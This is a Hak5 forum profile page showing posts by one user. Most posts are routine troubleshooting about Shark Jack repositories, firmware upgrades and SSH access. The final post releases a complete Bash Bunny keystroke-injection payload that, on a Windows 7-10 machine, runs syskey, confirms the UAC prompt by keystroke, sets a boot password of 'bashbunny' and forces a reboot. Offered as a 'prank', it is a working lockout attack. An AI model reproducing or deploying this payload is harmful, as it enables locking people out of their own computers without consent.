Jump to content

InfoSecREDD

Active Members
  • Posts

    147
  • Joined

  • Last visited

  • Days Won

    9

Posts posted by InfoSecREDD

  1. 1 hour ago, 3merc said:

    I just wanted to point out that this is still an issue - the Hak5 Shark Jack package repository remains unavailable.  Is this intended?

     

    Yes. This is still the case, just ignore the error from Hak5's Repo for the moment. All other repo's sync fine.

  2. Try using PuTTy for Windows to connect. The issue with it not being able to be accessed via Windows is really interesting.  

    Make sure you follow the exact directions on the "Manual Upgrade" Documentation, and back up your loot folder. (Anytime firmware is flashed, storage will get wiped.)

  3. One.. Your loot directory deletes when you upgrade firmware.

    2nd issue, with the SSH issue. - I would personally try to manually force a firmware upgrade to make sure everything worked perfectly.

    Also make sure your md5sum of the file is same as the firmware file on the Hak5 Servers.

  4. Since I have a broken BashBunny and the skills to perform a dump or interact with the Development part of the BashBunny. I was wondering if it was allowed to post findings and possible improvements I can make/share with the Dev Community to possibly make this firmware any better?..

    -Ar1k88

  5. 15 minutes ago, Dave-ee Jones said:

    You could potentially do that yourself, but you would void your warranty.

    (Hint: There are some spare pins and a USB Host header on the board of the BB).

    Oh I know I could do it, I was waiting for "Hak5" to do it.. Lol.. :P 

    I have a Zero W with P4wnP1 already on it.. Honestly BashBunny is more convenient to use than the P4wnP1.. But both has it's advantages.. :) 

  6. I saw a Syskey Prank done on a USB via RubberDucky. So I decided to rewrite one for the Bashbunny even tho it really serves no great purpose. 

     

    So furthermore, after Syskey'ing myself. I dont want the dang thing anymore, so I'm releasing it.

    #!/bin/bash
    #
    # Title:         SysKey and Reboot
    # Author:        Ar1k88
    # Version:       1.1b
    # Target:        Windows 7-10
    #
    
    #   LED                 |  Function
    # ---------------------------------------------------------
    # MAGENTA SLOW          - USB Detection/Setup
    # YELLOW FAST/VERYFAST  - Script Startup/Execute
    # CYAN VERYFAST         - Shutting down Target Machine
    # GREEN BLINK/SOLID     - Shutting down Bashbunny for safe removal
    # LED OFF               - Bashbunny is Off, Safe to remove.
    #
    
    # Startup Delay 3 seconds. 
    LED M SLOW
    ATTACKMODE HID
    Q DELAY 3000
    
    # Force to Desktop
    LED Y FAST
    Q GUI d
    Q DELAY 250
    
    
    # Open Run and Syskey
    Q GUI r
    Q DELAY 500
    Q STRING syskey
    Q ENTER
    Q DELAY 500
    
    # UAC Bypass
    Q ALT y
    
    # Setup Syskey - Setting Password as bashbunny
    LED Y VERYFAST
    Q DELAY 500
    Q STRING u
    Q DELAY 250
    Q STRING p
    Q DELAY 250
    Q STRING w
    Q DELAY 250
    Q STRING bashbunny
    Q TAB
    Q DELAY 250
    Q STRING bashbunny
    Q DELAY 250
    Q ENTER
    Q DELAY 500
    Q ENTER
    
    # Rebooting Target Machine
    LED C VERYFAST
    Q GUI r
    Q DELAY 500
    Q STRING CMD
    Q ENTER
    Q DELAY 500
    Q STRING shutdown /r /f /t 0
    Q ENTER
    Q DELAY 250
    
    # Success - Starting Bashbunny Safe Shutdown
    LED SUCCESS
    sync -o
    Q DELAY 3000
    
    shutdown 0

     

    SysKey Password: bashbunny

     

     

     

     

    Please be responsible. ;)

     

    -Ar1k88

×
×
  • Create New...